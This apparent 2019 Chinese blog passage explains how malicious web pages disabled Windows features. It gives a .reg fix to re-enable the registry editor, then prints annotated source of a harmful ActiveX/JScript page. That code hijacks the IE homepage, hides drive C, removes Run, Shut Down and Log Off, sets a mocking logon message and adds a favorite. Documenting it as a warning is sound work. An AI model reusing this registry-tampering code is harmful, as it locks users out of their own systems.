浏览网页注册表被禁用

原創

2019-07-16 13:11

浏览网页注册表被禁用

这是由于注册表 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值“DisableRegistryTools”被修改为“1”的缘故，将其键值恢复为“0”即可恢复注册表的使用。

解决办法：用记事本程序建立以REG为后缀名的文件，将下面这些内容复制在其中就可以了：

REGEDIT4
            [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
            “DisableRegistryTools”=dword:00000000

10、浏览网页开始菜单被修改

这是最“狠”的一种，让浏览者有生不如死的感觉。浏览后不仅有类似上面所说的那些症状，还会有以下更悲惨的遭遇：

1)禁止“关闭系统”
            2)禁止“运行”
            3)禁止“注销”
            4)隐藏C盘——你的C盘找不到了！
            5)禁止使用注册表编辑器regedit
            6)禁止使用DOS程序
            7)使系统无法进入“实模式”
            8)禁止运行任何程序

原来，该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害，查看其源代码，将其主要部分列了出来，并加了详细的注释（文中有“注”字的部分注释）。

注：下面代码是将你的IE默认连接首页改为[url]http://www.findfeel.com/[/url]

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
            Start Page", "http://www.findfeel.com/"）;
            注：以下是该网页修改受害者的注册表项所用的招数
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
            \\Policies\\Explorer\\NoRun", 01, "REG_BINARY"）;
            注：使受害者系统没有“运行”项，这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表
            的修改。
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\\Explorer\\NoClose", 01, "REG_BINARY"）;
            注：使受害者系统没有“关闭系统”项
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"）;
            注：使受害者系统没有“注销”项
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"）;
            注：使受害者系统没有逻辑驱动器C
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\\WinOldApp\\ Disabled","REG_BINARY"）;
            注：禁止运行所有的DOS应用程序；
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\ \WinOldApp\\NoRealMode","REG_BINARY"）;
            注：使系统不能启动到“实模式”（传统的DOS模式）下；
            又注：进入该网页，它还会修改以下的注册表项，使WINDOWS系统登录时显示一个登录窗口（在
            MicroSoft网络用户登录之前）
            Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Winlogon\\LegalNoticeCaption", "呜啦啦..."）;
            注：这些代码会使窗口的标题是“呜啦啦…”
            Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Winlogon\\LegalNoticeText", "欢迎你！你这个超级无敌大白痴！《呜啦啦...》故事开始了，按确定
            进入悲惨世界"）;
            注：上面一行是会在窗口中显示出来的文字
            注：下面两行代码修改注册表，使受害者所有的IE窗口都加上以下的标题：“呜啦啦…”
            Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
            Window Title", "呜啦啦..."）;
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
            Window Title", "呜啦啦..."）;
            注：到上面一行为止，完成了对受害者的注册表的所有修改！
            注：下面代码用来将其网页增加到受害者的收藏夹中
            var WF, Shor, loc;
            WF = FSO.GetSpecialFolder（0）;
            loc = WF + "\\Favorites";
            if（!FSO.FolderExists（loc））
            {
            loc = FSO.GetDriveName（WF） + "\\Documents and Settings\\
            " + Net.UserName + "\\Favorites";
            if（!FSO.FolderExists（loc））
            {
            return;
            }
            }
            注：下面就是使其网页加入到你的收藏夹的具体代码
            AddFavLnk（loc, "找到感觉[url]www.findfeel.com[/url]", "http://www.findfeel.com"）;